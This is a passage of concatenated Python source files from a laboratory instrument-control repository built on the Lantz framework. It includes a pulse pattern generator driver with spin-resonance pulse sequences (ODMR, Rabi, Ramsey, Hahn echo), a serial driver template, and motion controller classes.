# now process data
return result
@segment_data.setter
def segment_data(self, chan_seg, data_stream):
"""
Sets the data from segment seg_num, channel chan to data_stream (numpy array)
"""
print('called data setter')
channel = chan_seg[0]
seg_num = chan_seg[1]
data = self.encode_data(data_stream[0])
self.write('DIG:PATT:SEGM{}:DATA{} {}'.format(seg_num, channel, data))
return data
@Feat(limits=(1,5,1))
def start_seg(self):
"""
Queries the starting segment for the device pattern.
"""
return int(self.query('DIG:PATT:LOOP:STAR?'))
@start_seg.setter
def start_seg(self, segment):
"""
Sets the starting segment for the device pattern to segment.
"""
return self.write('DIG:PATT:LOOP:STAR {}'.format(segment))
@Feat(limits=(1,5,1))
def loop_length(self):
"""
Queries the number of segments to be repeated in the loop.
"""
return int(self.query('DIG:PATT:LOOP:LENG?'))
@loop_length.setter
def loop_length(self, length):
"""
Sets the number of segments to be included in the loop.
"""
return self.write('DIG:PATT:LOOP:LENG {}'.format(length))
@DictFeat(keys=channels, limits=(0, 2*np.pi))
def phase_delay(self, chan):
"""
Returns the phase delay of the output signal of channel chan, in radians.
"""
return float(self.query('PHAS{}?'.format(chan)))
@phase_delay.setter
def phase_delay(self, chan, delay):
"""
Sets the phase delay of the output signal of channel chan to delay, in radians.
"""
return self.write('PHAS{} {}'.format(chan, delay))
@DictFeat(keys=channels, limits=(0, 3000e-9))
def timed_delay(self, chan):
"""
Returns the timed delay of the output signal of channel chan in seconds.
"""
return float(self.query('PULS:DEL{}?'.format(chan)))
@timed_delay.setter
def timed_delay(self, chan, sec):
"""
Sets the timed delay of output of channel chan to sec.
"""
return self.write('PULS:DEL{} {}S'.format(chan, sec))
@Feat()
def trig_output(self):
"""
Returns the voltage level used for trigger output.
"""
return self.query('PULS:TRIG:VOLT?')
@Feat()
def trig_pos(self):
"""
Returns the trigger out position in pattern mode, returning the segment number.
"""
return self.query('PULS:TRIG:POS?')
@Feat(values=TRIG_MODE_VALS)
def trig_mode(self):
"""
Returns the trigger out generation mode in pattern mode.
"""
return self.query('PULS:TRIG:MODE?')
@trig_mode.setter
def trig_mode(self, trigger_mode):
"""
Sets the trigger out generation mode (pattern mode only). Options are
continuous or start.
"""
return self.write('PULS:TRIG:MODE {}'.format(trigger_mode))
def encode_data(self, data_series):
"""
Helper function to implement IEEE 488.2 7.7.6.2 program data protocol.
Encodes data_series (numpy byte array) into format that can be read by PPG.
"""
# starts with # character
data_string = '#'
# hack to avoid issues w/ ellipses in large np arrays
np.set_printoptions(threshold=65536)
raw_data = np.array_str(data_series, max_line_width=65536)
np.set_printoptions(threshold=1000)
# figure out length of data_series
data_length = data_series.size
# figure out length of length of data_series
len_data_length = len(str(data_length))
# add all this stuff
data_string += str(len_data_length)
data_string += str(data_length)
# TODO: fix import
#max_line_width avoids adding newline or whitespace
#raw_data = np.array_str(data_series, max_line_width=1000000)
data_string += raw_data[1:-1:2] #strips out left bracket, right bracket, and spaces
return data_string
def decode_data(self, encoded_series):
"""
Helper function to implement IEEE 488.2 7.7.6.2 program data protocol.
Decodes encoded_series from PPG into raw data that can be read.
"""
if encoded_series[0] != '#':
print('invalid encoded series!')
len_len = int(encoded_series[1])
char_list = list(encoded_series[2+len_len:])
return [int(x) for x in char_list]
def preview_wfm(self):
import matplotlib.pyplot as plt
# code to figure out timeseries + number of points
loop_start = self.start_seg
loop_len = self.loop_length
segments = [loop_start]
current_seg = loop_start
# probably not the best way possible to do this, but it works...
while loop_len > 1:
current_seg += 1
loop_len -= 1
if current_seg > 4:
segments.append(current_seg % 4)
else:
segments.append(current_seg)
patt_length = 0
for seg in segments:
patt_length += self.dig_patt_length[seg]
print('seg{}:{}'.format(seg, self.dig_patt_length[seg]))
print('Total length:{}'.format(patt_length))
freq = self.frequency
t = np.arange(0, patt_length, 1)/freq
chan1 = np.zeros(patt_length)
chan2 = np.zeros(patt_length)
current_index = 0
for seg in segments:
seg_type_1 = self.dig_patt_type[(1, seg)]
seg_type_2 = self.dig_patt_type[(2, seg)]
length = self.dig_patt_length[seg]
if seg_type_1 == 'low':
chan1[current_index:current_index+length] = 0
elif seg_type_1 == 'high':
chan1[current_index:current_index+length] = 1
elif seg_type_1 == 'data':
chan1[current_index:current_index+length] = self.segment_data[(1,seg)]
if seg_type_2 == 'low':
chan2[current_index:current_index+length] = 0
elif seg_type_2 == 'high':
chan2[current_index:current_index+length] = 1
elif seg_type_2 == 'data':
chan2[current_index:current_index+length] = self.segment_data[(2, seg)]
current_index += length
#chan1 = np.zeros()
#chan2 = np
def square(t_val, tmax):
"""
Square wave helper function for plotting trigger output
"""
if t_val < tmax/2.0:
return 1
else:
return 0
vectorized_square = np.vectorize(square) #vectorize because :gottagofast:
plt.figure(1)
plt.subplot(311)
plt.ylabel('$T_0$')
axes = plt.gca()
axes.step(t, vectorized_square(t, t.max()), 'k-', where='mid')
axes.set_ylim([-0.5,1.5])
# now plot series from channel 1
plt.subplot(312)
plt.ylabel('Channel 1')
axes = plt.gca()
axes.step(t, chan1, 'r--', where='mid')
axes.set_ylim([-0.5,1.5])
# plot series from channel 2
plt.subplot(313)
plt.ylabel('Channel 2')
axes = plt.gca()
axes.step(t, chan2, 'r--', where='mid')
axes.set_ylim([-0.5,1.5])
#plt.show()
@Action()
def odmr_waveform(self, preview_wfm=False, ref_freq=503.0):
ref_freq = 503.0
print('Setting up ODMR waveforms')
print('Identification: {}'.format(self.idn))
self.reset() #initializes default parameters for clean setup
self.display = 'off'
print('Display off?: {}'.format(self.display))
self.pattern_mode = 'on'
print('Digital pattern mode on?:{}'.format(self.pattern_mode))
self.arm_source = 'immediate' # sets continuous operation
print('Arm source immediate?: {}'.format(self.arm_source))
# output TTL pulses for RF switch on channel 1
# TTL pulses should be between 0 (low) and 2.5 (high) volts
# so set up channel 1 output like this
self.volt_low[1] = 0.0
self.volt_high[1] = 2.5
print('High voltage, should be 2.5 V:{}'.format(self.volt_high[1]))
print('Low voltage, should be 0 V:{}'.format(self.volt_low[1]))
self.volt_low[2] = 0.0
self.volt_high[2] = 1.0
print('High voltage, should be 1.0 V:{}'.format(self.volt_high[2]))
print('Low voltage, should be 0 V:{}'.format(self.volt_low[2]))
self.data_format[1] = 'nrz'
self.data_format[2] = 'nrz'
#ref_freq = 503.0 #Hz
# since we have two pieces to the square wave, the frequency generator should
# be set to use at least twice the references.
self.frequency = 2*ref_freq
self.dig_patt_length[1] = 4
self.dig_patt_type[(2,1)] = 'high'
self.dig_patt_type[(1,1)] = 'data'
self.write('DIG:PATT:SEGM1:PRES1 2, 2')
#self.segment_data[2,1] = [np.ones(4)]
print('Internal PLL frequency:{}'.format(self.frequency))
#print(self.segment_data[1,1])
#print(self.segment_data[2,1])
#self.output_on[1] = 'on'
#self.output_on[2] = 'on'
print(self.output_on[1])
print(self.output_on[2])
self.output_on[1] = 'on'
self.output_on[2] = 'on'
print(self.output_on[1])
print(self.output_on[2])
print(self.output_on[2])
print(self.output_on[2])
#self.dig_patt_length[2] = scale_factor
# ignore last two segments
#self.dig_patt_length[3] = 0
#self.dig_patt_length[4] = 0
#for i in range(1,5):
# print('Segment {} length: {}'.format(i, self.dig_patt_length[i]))
#if preview_wfm:
# self.preview_wfm()
# configure two segements, one where channel 1 is high + one where channel 1 is low
#self.dig_patt_type[(1, 1)] = 'high'
#print('Channel {}, segment {} type:{}'.format(1, 1, self.dig_patt_type[(1, 1)]))
#self.dig_patt_type[(1, 2)] = 'low'
#print('Channel {}, segment {} type:{}'.format(1, 2, self.dig_patt_type[(1, 2)]))
# external sync goes to TTL ref in on back of lockin
print('TODO: check that the output on the scope of this is actually reasonable')
def outputs_high(self, preview_wfm=False, ref_freq=503.0):
ref_freq = 10e6
print('PPG all outputs high!')
print('Identification: {}'.format(self.idn))
self.reset() #initializes default parameters for clean setup
self.display = 'off'
print('Display off?: {}'.format(self.display))
self.pattern_mode = 'on'
print('Digital pattern mode on?:{}'.format(self.pattern_mode))
self.arm_source = 'immediate' # sets continuous operation
print('Arm source immediate?: {}'.format(self.arm_source))
# output TTL pulses for RF switch on channel 1
# TTL pulses should be between 0 (low) and 2.5 (high) volts
# so set up channel 1 output like this
self.volt_low[1] = 0.0
self.volt_high[1] = 2.5
print('High voltage, should be 2.5 V:{}'.format(self.volt_high[1]))
print('Low voltage, should be 0 V:{}'.format(self.volt_low[1]))
self.volt_low[2] = 0.0
self.volt_high[2] = 1.0
print('High voltage, should be 1.0 V:{}'.format(self.volt_high[2]))
print('Low voltage, should be 0 V:{}'.format(self.volt_low[2]))
self.data_format[1] = 'nrz'
self.data_format[2] = 'nrz'
#ref_freq = 503.0 #Hz
# since we have two pieces to the square wave, the frequency generator should
# be set to use at least twice the references.
self.frequency = 2*ref_freq
self.dig_patt_length[1] = 4
self.dig_patt_type[(2,1)] = 'high'
self.dig_patt_type[(1,1)] = 'high'
#self.segment_data[2,1] = [np.ones(4)]
print('Internal PLL frequency:{}'.format(self.frequency))
#print(self.segment_data[1,1])
#print(self.segment_data[2,1])
#self.output_on[1] = 'on'
#self.output_on[2] = 'on'
print(self.output_on[1])
print(self.output_on[2])
self.output_on[1] = 'on'
self.output_on[2] = 'on'
print(self.output_on[1])
print(self.output_on[2])
print(self.output_on[2])
print(self.output_on[2])
def rabi_waveform_step(inst, step_number):
# helper function to program the second segment of PPG waveforms to perform Rabi
#print('not implemented yet!')
#inst.output_on[1] = 'off'
#inst.output_on[2] = 'off'
#inst.comp_output_on[1] = 'off'
print(step_number)
T_init = 13200
T_rabi_max = 224
T_readout = 13200
off_len = T_rabi_max/2 - step_number
on_len = 2*step_number
data = [np.hstack((np.zeros(off_len, dtype='int'), np.ones(on_len, dtype='int'), np.zeros(off_len, dtype='int')))]
print(data)
#readout = [np.hstack((np.ones(T_readout + T_init, dtype='int'), np.zeros(T_rabi_max, dtype='int'), np.ones(T_readout, dtype='int')))]
#inst.segment_data[(1,2)] = data
encoded = inst.encode_data(data[0])
seg_num = 2
channel = 1
inst.write('DIG:PATT:SEGM{}:DATA{} {}'.format(seg_num, channel, encoded))
print('Channel {}, segment {} data:'.format(1, 2, inst.segment_data[(1,2)]))
#inst.output_on[2] = 'on'
return -1
def rabi_waveform_setup(inst, rabi_params):
# unpack measurement paramters
#T_init = rabi_params['T_init']
#T_readout = rabi_params['T_readout']
print('Running Rabi waveform')
print('Identification: {}'.format(inst.idn))
inst.reset() #initializes default parameters for clean setup
inst.display = 'off'
print('Display off?: {}'.format(inst.display))
inst.pattern_mode = 'on'
print('Digital pattern mode on?:{}'.format(inst.pattern_mode))
#inst.arm_source = 'immediate' # sets continuous operation
#print('Arm source immediate?: {}'.format(inst.arm_source))
inst.frequency = 660e6/20.0
# output TTL pulses for RF switch on channel 1
# TTL pulses should be between 0 (low) and 2.5 (high) volts
# so set up channel 1 output like this
inst.volt_low[1] = 0.0
inst.volt_high[1] = 2.5
print('MW TTL high voltage, should be 2.5 V:{}'.format(inst.volt_high[1]))
print('MW TTL low voltage, should be 0 V:{}'.format(inst.volt_low[1]))
inst.data_format[1] = 'nrz'
inst.output_on[1] = 'on'
inst.comp_output_on[1] = 'on' #for scope viewing
# set up laser channel
inst.volt_low[2] = 0.0
inst.volt_high[2] = 1.0
print('AOM high voltage, should be 1.0 V:{}'.format(inst.volt_high[2]))
print('AOM Low voltage, should be 0 V:{}'.format(inst.volt_low[2]))
inst.data_format[2] = 'nrz'
inst.output_on[2] = 'on'
print('Trigger type:{}'.format(inst.trig_output))
#inst.timed_delay[1] = 100e-9 #ns
#inst.timed_delay[2] = 250e-9 #ns
print('Channel 1 timed_delay:{}'.format(inst.timed_delay[1]))
print('Channel 2 timed_delay:{}'.format(inst.timed_delay[2]))
# set up 3 different segments
# start at segment 1 and loop through all 3 segments
T_init = 13200
T_rabi_max = 224
T_readout = 13200
# Segment 1 - laser initializes spin for T_init
inst.dig_patt_length[1] = T_init
#print('Segment {} length:{}'.format(1, inst.dig_patt_length[1]))
# Segment 1 - RF off
inst.dig_patt_type[(1, 1)] = 'low'
#print('Channel {}, segment {} type:{}'.format(1, 1, inst.dig_patt_type[(1, 1)]))
# Segment 1 - laser on, initializing spin
inst.dig_patt_type[(2, 1)] = 'high'
#print('Channel {}, segment {} type:{}'.format(2, 1, inst.dig_patt_type[(2, 1)]))
# Segment 2 - apply variable length RF pulse
# 2 rf is on for variable time tau_rf
inst.dig_patt_length[2] = T_rabi_max
#print('Segment {} length:{}'.format(2, inst.dig_patt_length[2]))
inst.dig_patt_type[(1,2)] = 'data'
#print('Channel {}, segment {} type:{}'.format(1, 2, inst.dig_patt_type[(1, 2)]))
# Set up segment 2 RF - initial point is with no RF on
inst.segment_data[(1,2)] = [np.zeros(T_rabi_max, dtype='int')]
#print('Channel {}, segment {} data:'.format(1, 2, inst.segment_data[(1,2)]))
# Segment 2 - laser is off
inst.dig_patt_type[(2, 2)] = 'low'
#print('Channel {}, segment {} type:{}'.format(2, 2, inst.dig_patt_type[(2, 2)]))
# Segment 3 - laser reads out, initializes, waits, reads out
inst.dig_patt_length[3] = T_rabi_max + T_init + 2 * T_readout
#print('Segment {} length:{}'.format(3, inst.dig_patt_length[3]))
# Segment 3 - RF is always off
inst.dig_patt_type[(1, 3)] = 'low'
#print('Channel {}, segment {} type:{}'.format(1, 3, inst.dig_patt_type[(1, 3)]))
# Segment 3 - laser initializes, waits, reads out
inst.dig_patt_type[(2, 3)] = 'data'
#print('Channel {}, segment {} type:{}'.format(2, 3, inst.dig_patt_type[(2, 3)]))
readout1 = [np.hstack((np.ones(T_readout + T_init, dtype='int'), np.zeros(T_rabi_max, dtype='int')))]
print(inst.dig_patt_length)
#print(readout[0].shape)
inst.segment_data[(2,3)] = readout1 #[np.hstack((np.ones(T_readout + T_init, dtype='int'), np.zeros(T_rabi_max, dtype='int'), np.ones(T_readout, dtype='int')))]
# Segment 3 - RF is always off
inst.dig_patt_type[(1, 3)] = 'low'
#print('Channel {}, segment {} type:{}'.format(1, 3, inst.dig_patt_type[(1, 3)]))
# Segment 3 - laser initializes, waits, reads out
inst.dig_patt_type[(2, 3)] = 'data'
#print('Channel {}, segment {} type:{}'.format(2, 3, inst.dig_patt_type[(2, 3)]))
inst.dig_patt_type[(1, 4)] = 'low'
inst.dig_patt_type[(2, 4)] = 'data'
readout2 = [np.hstack((np.ones(T_readout, dtype='int')))]
print(inst.dig_patt_length)
#print(readout[0].shape)
inst.segment_data[(2,4)] = readout2 #[np.hstack((np.ones(T_readout + T_init, dtype='int'), np.zeros(T_rabi_max, dtype='int'), np.ones(T_readout, dtype='int')))]
# sets PPG to loop through segments 1-3 repeatedly
inst.start_seg = 1
inst.loop_length = 3
print('Trigger source?: {}'.format(inst.trigger_source))
inst.trigger_source = 'internal'
print('Trigger source?: {}'.format(inst.trigger_source))
print('trigger mode:{}'.format(inst.trig_mode))
print(inst.trig_output)
print('trigger position:{}'.format(inst.trig_pos))
#from time import sleep
#sleep(10)
#inst.write('ARM:SOUR MAN')
#inst.write('ARM:MODE STAR')
#inst.write('DIG:PATT:LOOP:INF ON')
#inst.write('DIG:PATT:INST:STAR SEGM1')
#inst.write('DIG:PATT:LOOP:LENG 3')
#inst.preview_wfm()
#
# data = np.random.randint(2, size=100, dtype=np.uint8)
# encoded = inst.encode_data(data)
#
# print('Data:{}'.format(data))
# print('Encoded:{}'.format(encoded))
#
# decoded = inst.decode_data('{}'.format(encoded))
# print('Decoded:{}'.format(decoded))
# for segment in segments:
#
# segment_length = inst.dig_patt_length[segment]
#
# for channel in [1,2]:
#
# v_high = inst.volt_high[channel]
# v_low = inst.volt_low[channel]
#
# segment_type = inst.dig_patt_type[(channel, segment)]
#
# if segment_data == 'data':
# pass
# #data = inst.segment_data[(channel, segment)]
#
#
# #print(segment)
# #print(inst.segment_data[(channel, segment)])
#
# #print(data)
# plt.plot(data)
# plt.xlabel('Time')
# plt.ylabel('Voltage')
# plt.show()
# figure out these numbers!
T_init = 1000 #us
T_gap = 50 #us
T_readout = 1000 #us
tau_rf = 100*1e-3 #100 ns
# program pattern of RF on for tau after T_init + T_gap / 2 - tau_rf
# figure out how to vary tau_rf + have it still placed appropriately
def pulse_odmr_setup(inst):
"""
Sets up PPG output channels for pulsed ODMR measurements.
"""
print('Identification: {}'.format(inst.idn))
inst.reset() #initializes default parameters for clean setup
inst.display = 'off'
print('Display off?: {}'.format(inst.display))
inst.pattern_mode = 'on'
print('Digital pattern mode on?:{}'.format(inst.pattern_mode))
#inst.arm_source = 'immediate' # sets continuous operation
#print('Arm source immediate?: {}'.format(inst.arm_source))
inst.frequency = 660e6
# output TTL pulses for RF switch on channel 1
# TTL pulses should be between 0 (low) and 2.5 (high) volts
# so set up channel 1 output like this
inst.volt_low[1] = 0.0
inst.volt_high[1] = 2.5
print('MW TTL high voltage, should be 2.5 V:{}'.format(inst.volt_high[1]))
print('MW TTL low voltage, should be 0 V:{}'.format(inst.volt_low[1]))
inst.data_format[1] = 'nrz'
inst.output_on[1] = 'on'
inst.comp_output_on[1] = 'on' #for scope viewing
# set up laser channel
inst.volt_low[2] = 0.0
inst.volt_high[2] = 1.0
print('AOM high voltage, should be 1.0 V:{}'.format(inst.volt_high[2]))
print('AOM Low voltage, should be 0 V:{}'.format(inst.volt_low[2]))
inst.data_format[2] = 'nrz'
inst.output_on[2] = 'on'
inst.comp_output_on[2] = 'on' #for scope viewing
print('Trigger type:{}'.format(inst.trig_output))
#inst.timed_delay[1] = 100e-9 #ns
#inst.timed_delay[2] = 250e-9 #ns
print('Channel 1 timed_delay:{}'.format(inst.timed_delay[1]))
print('Channel 2 timed_delay:{}'.format(inst.timed_delay[2]))
def rabi_step(inst, step_number):
"""
Sets up next waveform point for Rabi
"""
T_rabi_max = 4096
data = [np.hstack((np.ones(step_number, dtype='int'), np.zeros(T_rabi_max - step_number, dtype='int')))]
encoded = inst.encode_data(data[0])
seg_num = 3
channel = 1
inst.write('DIG:PATT:SEGM{}:DATA{} {}'.format(seg_num, channel, encoded))
def ramsey_setup(inst, ramsey_params, pi_pulse_len):
T_ramsey_max = 6144
T_init = 336*5 #~2.5us
T_gap = 16*15 # segment 2, everything off
T_readout = 336*5 #~2.5us
pi_pulse = np.ones(pi_pulse_len, dtype='int')
pad = np.zeros(T_ramsey_max - pi_pulse_len, dtype='int')
# Segment 1 - RF off, laser on to initialize
inst.dig_patt_length[1] = T_init
inst.dig_patt_type[(1, 1)] = 'low'
inst.dig_patt_type[(2, 1)] = 'high'
# Segment 2 - gap, everything is off
inst.dig_patt_length[2] = T_gap
inst.dig_patt_type[(1,2)] = 'low'
inst.dig_patt_type[(2,2)] = 'low'
# Segment 3 - laser is off, variable length RF pulse
inst.dig_patt_length[3] = T_ramsey_max
inst.dig_patt_type[(2, 3)] = 'low'
inst.dig_patt_type[(1,3)] = 'data'
# Set up segment 2 RF - initial point is pi pulse w/o separation
inst.segment_data[(1,3)] = [np.hstack((pi_pulse, pad))]
# Segment 4 - laser reads out
inst.dig_patt_length[4] = T_readout
# Segment 4 - RF is always off, laser on
inst.dig_patt_type[(1, 4)] = 'low'
inst.dig_patt_type[(2, 4)] = 'high'
def ramsey_step(inst, ramsey_params, pi_pulse_len, tau):
T_ramsey_max = 6144
pi_pulse = np.ones(pi_pulse_len, dtype='int')
pi2_pulse = np.ones(int(pi_pulse_len/2), dtype='int')
delay = np.zeros(tau, dtype='int')
pad = np.zeros((T_ramsey_max - (tau + pi_pulse_len)), dtype='int')
data = np.hstack((pi2_pulse, delay, pi2_pulse, pad))
seg_num = 3
channel = 1
encoded = inst.encode_data(data)
inst.write('DIG:PATT:SEGM{}:DATA{} {}'.format(seg_num, channel, encoded))
def hahn_setup(inst, hahn_params):
freq = hahn_params['ppg_freq']
inst.frequency = freq
conversion = freq / 660e6
T_hahn_max = hahn_params['T_hahn_max']
T_init = int(hahn_params['T_init'] * conversion)
T_gap = int(hahn_params['T_gap'] * conversion)
T_readout = int(hahn_params['T_readout'] * conversion)
tau_min = int(hahn_params['tau_min'] * conversion)
pi_pulse_len = 2
pad = np.zeros(int((T_hahn_max - 2*pi_pulse_len - tau_min)/2.0), dtype='int')
pi_pulse = np.ones(pi_pulse_len, dtype='int')
pi2_pulse = np.ones(int(pi_pulse_len/2), dtype='int')
tau2 = np.zeros(int(tau_min/2), dtype='int')
# Segment 1 - RF off, laser on to initialize
inst.dig_patt_length[1] = T_init
inst.dig_patt_type[(1, 1)] = 'low'
inst.dig_patt_type[(2, 1)] = 'high'
# Segment 2 - gap, everything is off
inst.dig_patt_length[2] = T_gap
inst.dig_patt_type[(1,2)] = 'low'
inst.dig_patt_type[(2,2)] = 'low'
# Segment 3 - laser is off, pi/2, tau, pi, -pi/2 pulses
inst.dig_patt_length[3] = T_hahn_max
inst.dig_patt_type[(2, 3)] = 'low'
inst.dig_patt_type[(1,3)] = 'data'
hahn_data = np.hstack((pad, pi2_pulse, tau2, pi_pulse, tau2,
pi2_pulse, pad))
print(T_hahn_max)
print(hahn_data.shape)
inst.segment_data[(1,3)] = [hahn_data]
# Segment 4 - laser reads out
inst.dig_patt_length[4] = T_readout
# Segment 4 - RF is always off, laser on
inst.dig_patt_type[(1, 4)] = 'low'
inst.dig_patt_type[(2, 4)] = 'high'
def hahn_step(inst, hahn_params, tau):
T_hahn_max = hahn_params['T_hahn_max']
pi_pulse_len = hahn_params['pi_pulse_len']
pi_pulse = np.ones(pi_pulse_len, dtype='int')
pi2_pulse = np.ones(int(pi_pulse_len/2), dtype='int')
tau2 = np.zeros(int(tau/2), dtype='int')
pad = np.zeros(int((T_hahn_max - 2*pi_pulse_len - tau)/2.0), dtype='int')
hahn_data = np.hstack((pad, pi2_pulse, tau2, pi_pulse, tau2, pi2_pulse, pad))
print(hahn_data.shape)
seg_num = 3
channel = 1
encoded = inst.encode_data(hahn_data)
inst.write('DIG:PATT:SEGM{}:DATA{} {}'.format(seg_num, channel, encoded))
inst.segment_data[(channel, seg_num)]
return
def rabi_setup(inst):
"""
Sets up pulse sequence for doing Rabi
"""
T_init = 336*6 #500 ns
T_gap = 16*15 # segment 2, everything off
T_rabi_max = 4096
T_readout = 336*6 # 500 ns
# Segment 1 - RF off, laser on to initialize
inst.dig_patt_length[1] = T_init
inst.dig_patt_type[(1, 1)] = 'low'
inst.dig_patt_type[(2, 1)] = 'high'
# Segment 2 - gap, everything is off
inst.dig_patt_length[2] = T_gap
inst.dig_patt_type[(1,2)] = 'low'
inst.dig_patt_type[(2,2)] = 'low'
# Segment 3 - laser is off, variable length RF pulse
inst.dig_patt_length[3] = T_rabi_max
inst.dig_patt_type[(2, 3)] = 'low'
inst.dig_patt_type[(1,3)] = 'data'
# Set up segment 2 RF - initial point is with no RF on
inst.segment_data[(1,3)] = [np.zeros(T_rabi_max, dtype='int')]
# Segment 4 - laser reads out
inst.dig_patt_length[4] = T_readout
# Segment 4 - RF is always off, laser on
inst.dig_patt_type[(1, 4)] = 'low'
inst.dig_patt_type[(2, 4)] = 'high'
print('Trigger source?: {}'.format(inst.trigger_source))
inst.trigger_source = 'internal'
print('Trigger source?: {}'.format(inst.trigger_source))
print('trigger mode:{}'.format(inst.trig_mode))
print(inst.trig_output)
print('trigger position:{}'.format(inst.trig_pos))
def calibrate_pi_setup(inst, downconversion_rate):
inst.frequency = 660e6 / downconversion_rate
print(inst.frequency)
T_init = int(336*6 / downconversion_rate) #500 ns
T_gap = int(16*15 / downconversion_rate) # segment 2, everything off
T_rabi_max = int(4096 / downconversion_rate)
T_readout = int(336*6 / downconversion_rate) # 500 ns
# Segment 1 - RF off, laser on to initialize
inst.dig_patt_length[1] = T_init
inst.dig_patt_type[(1, 1)] = 'low'
inst.dig_patt_type[(2, 1)] = 'high'
# Segment 2 - gap, everything is off
inst.dig_patt_length[2] = T_gap
inst.dig_patt_type[(1,2)] = 'low'
inst.dig_patt_type[(2,2)] = 'low'
# Segment 3 - laser is off, variable length RF pulse
inst.dig_patt_length[3] = T_rabi_max
inst.dig_patt_type[(2, 3)] = 'low'
inst.dig_patt_type[(1,3)] = 'data'
# Set up segment 2 RF - initial point is with no RF on
num_pulses = 5
data = np.hstack((np.ones(2*num_pulses, dtype='int'), np.zeros(T_rabi_max - 2*num_pulses, dtype='int')))
inst.segment_data[(1,3)] = [data]
# Segment 4 - laser reads out
inst.dig_patt_length[4] = T_readout
# Segment 4 - RF is always off, laser on
inst.dig_patt_type[(1, 4)] = 'low'
inst.dig_patt_type[(2, 4)] = 'high'
inst.trigger_source = 'internal'
return
if __name__ == '__main__':
test_wfm = True
test_rabi = False
test_comm = False
gpib_addr = 10
with Ag81130A('GPIB0::{}::INSTR'.format(gpib_addr)) as inst:
#inst.preview_wfm()
if test_wfm:
inst.odmr_waveform()
elif test_rabi:
rabi_waveform_test(inst)
elif test_comm:
print('Identification: {}'.format(inst.idn))
inst.reset()
print('Display: {}'.format(inst.display))
inst.display = 'off'
print('Display: {}'.format(inst.display))
print('Digital pattern mode: {}'.format(inst.pattern_mode))
inst.pattern_mode = 'on'
print('Digital pattern mode: {}'.format(inst.pattern_mode))
print('Arm source: {}'.format(inst.arm_source))
inst.arm_source = 'manual'
print('Arm source: {}'.format(inst.arm_source))
inst.arm_source = 'immediate'
print('Arm source: {}'.format(inst.arm_source))
for segment in range(1,5):
print('Segment {} length:{}'.format(segment, inst.dig_patt_length[segment]))
inst.dig_patt_length[segment] = 100
print('Segment {} length:{}'.format(segment, inst.dig_patt_length[segment]))
for channel in [1,2]:
print('Channel {} high:{}V'.format(channel, inst.volt_high[channel]))
inst.volt_high[channel] = 3.0
print('Channel {} high:{}V'.format(channel, inst.volt_high[channel]))
inst.volt_high[channel] = 2.5
print('Channel {} high:{}V'.format(channel, inst.volt_high[channel]))
print('Channel {} low:{}V'.format(channel, inst.volt_low[channel]))
inst.volt_low[channel] = -1.0
print('Channel {} low:{}V'.format(channel, inst.volt_low[channel]))
inst.volt_low[channel] = 0.0
print('Channel {} low:{}V'.format(channel, inst.volt_low[channel]))
for segment in range(1,5):
inst.dig_patt_type[(channel, segment)] = 'high'
print('Channel {}, segment {} type:{}'.format(channel, segment, inst.dig_patt_type[(channel, segment)]))
print('Channel format:{}'.format(inst.data_format[channel]))
inst.data_format[channel] = 'nrz'
print('Channel format:{}'.format(inst.data_format[channel]))
print('Channel output:{}'.format(inst.output_on[channel]))
inst.output_on[channel] = 'on'
print('Channel output:{}'.format(inst.output_on[channel]))
```
#### File: drivers/examples/serial_example.py
```python
from lantz import Action, Feat, DictFeat
from lantz import MessageBasedDriver
class SerialTemplate(MessageBasedDriver):
"""Template for drivers connecting via serial port.
"""
DEFAULTS = {'ASRL': {'write_termination': '\n',
'read_termination': '\n'}}
@Feat()
def a_read_only_property(self):
"""Help for a a_read_only_property
"""
return self.query('*IDN?')
@Feat(units='V', limits=(10,))
def a_read_write_property(self):
"""Help for a_read_write_property
"""
return float(self.query('?AMP'))
@a_read_write_property.setter
def a_read_write_property(self, value):
self.query('!AMP {:.1f}'.format(value))
@DictFeat(values={True: '1', False: '0'}, keys=list(range(1,9)))
def a_read_write_dictionary_property(self, key):
"""Help for a_read_write_dictionary_property
"""
return self.query('?DOU {}'.format(key))
@a_read_write_dictionary_property.setter
def a_read_write_dictionary_property(self, key, value):
self.query('!DOU {} {}'.format(key, value))
@Action()
def do_something(self):
"""Help for do_something
"""
return
if __name__ == '__main__':
import argparse
import lantz.log
parser = argparse.ArgumentParser(description='Test Kentech HRI')
parser.add_argument('-i', '--interactive', action='store_true',
default=False, help='Show interactive GUI')
parser.add_argument('-p', '--port', type=str, default='17',
help='Serial port to connect to')
args = parser.parse_args()
lantz.log.log_to_socket(lantz.log.DEBUG)
with SerialTemplate(args.port) as inst:
if args.interactive:
from lantz.ui.app import start_test_app
start_test_app(inst)
else:
# Add your test code here
print('Non interactive mode')
```
#### File: drivers/motion/motioncontroller.py
```python
import time
import numpy as np
from lantz.feat import Feat
from lantz.action import Action
from lantz.driver import Driver
from pyvisa import constants
from lantz import Q_, ureg
from lantz.processors import convert_to
from .axis import MotionAxisSingle, MotionAxisMultiple
# Add generic units:
# ureg.define('unit = unit')
# ureg.define('encodercount = count')
# ureg.define('motorstep = step')
class MotionControllerMultiAxis(Driver):
""" Motion controller that can detect multiple axis
"""
def initialize(self):
super().initialize()
@Feat()
def idn(self):
raise AttributeError('Not implemented')
@Action()
def detect_axis(self):
""" Find the number of axis available.
The detection stops as soon as an empty controller is found.
"""
pass
@Action()
def get_errors(self):
raise AttributeError('Not implemented')
@Feat(read_once=False)
def position(self):
return [axis.position for axis in self.axes]
@Feat(read_once=False)
def _position_cached(self):
return [axis.recall('position') for axis in self.axes]
@position.setter
def position(self, pos):
"""Move to position (x,y,...)"""
return self._position(pos)
@Action()
def _position(self, pos, read_pos=None, wait_until_done=True):
"""Move to position (x,y,...)"""
if read_pos is not None:
self.log_error('kwargs read_pos for function _position is deprecated')
for p, axis in zip(pos, self.axes):
if p is not None:
axis._set_position(p, wait=False)
if wait_until_done:
for p, axis in zip(pos, self.axes):
if p is not None:
axis._wait_until_done()
axis.check_position(p)
return self.position
return pos
@Action()
def motion_done(self):
for axis in self.axes:
axis._wait_until_done()
def finalize(self):
for axis in self.axes:
if axis is not None:
del (axis)
super().finalize()
class MotionControllerSingleAxis(MotionAxisSingle):
""" Motion controller that can only has sinlge axis
"""
def initialize(self):
super().initialize()
```
#### File: drivers/newport_motion/motionesp301.py
```python
from lantz.feat import Feat
from lantz.action import Action
#from lantz.serial import SerialDriver
from lantz.messagebased import MessageBasedDriver
from pyvisa import constants
#from lantz.visa import GPIBVisaDriver
from lantz import Q_, ureg
from lantz.processors import convert_to
import time
import numpy as np
import copy
# Add generic units:
#ureg.define('unit = unit')
#ureg.define('encodercount = count')
#ureg.define('motorstep = step')
class ESP301(MessageBasedDriver):
